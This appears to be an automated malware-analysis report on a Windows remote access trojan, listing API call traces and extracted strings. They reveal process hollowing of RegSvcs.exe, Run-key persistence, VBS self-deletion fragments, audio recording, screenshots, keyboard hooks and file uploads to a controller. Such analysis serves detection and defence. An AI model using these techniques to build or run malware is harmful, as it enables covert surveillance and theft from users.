                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                    • GetLastError.KERNEL32 ref: 0041847A
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                    • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-332907002
                                    • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                    • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                    • ExitProcess.KERNEL32 ref: 0040D419
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                    • API String ID: 3797177996-2557013105
                                    • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                    • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                    • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                    • SetEvent.KERNEL32 ref: 0041B219
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                    • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-234082672
                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                    APIs
                                    • _wcslen.LIBCMT ref: 0040CE07
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                    • _wcslen.LIBCMT ref: 0040CEE6
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000000,00000000), ref: 0040CF84
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                    • _wcslen.LIBCMT ref: 0040CFC6
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                    • ExitProcess.KERNEL32 ref: 0040D062
                                    Similarity
                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                    • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$del$open
                                    • API String ID: 1579085052-1122443586
                                    • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                    • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                    • _wcslen.LIBCMT ref: 0041C13B
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                    • GetLastError.KERNEL32 ref: 0041C173
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                    • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                    Similarity
                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                    • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                    • API String ID: 2490988753-1941338355
                                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                    • ExitProcess.KERNEL32 ref: 0041D665
                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    APIs
                                    • API ID: _free$Info
                                    • String ID:
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                    • __aulldiv.LIBCMT ref: 00408D4D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                    • _free.LIBCMT ref: 004512FF
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00451321
                                    • _free.LIBCMT ref: 00451336
                                    • _free.LIBCMT ref: 00451341
                                    • _free.LIBCMT ref: 00451363
                                    • _free.LIBCMT ref: 00451376
                                    • _free.LIBCMT ref: 00451384
                                    • _free.LIBCMT ref: 0045138F
                                    • _free.LIBCMT ref: 004513C7
                                    • _free.LIBCMT ref: 004513CE
                                    • _free.LIBCMT ref: 004513EB
                                    • _free.LIBCMT ref: 00451403
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041C726
                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00419FB9
                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                      • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                      • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    APIs
                                    • API ID: _free
                                    • String ID:
                                    APIs
                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                    • GetLastError.KERNEL32 ref: 00455CEF
                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                    • GetLastError.KERNEL32 ref: 00455D0C
                                    • __dosmaperr.LIBCMT ref: 00455D15
                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                    • GetLastError.KERNEL32 ref: 00455EB1
                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                    • __freea.LIBCMT ref: 0044AE30
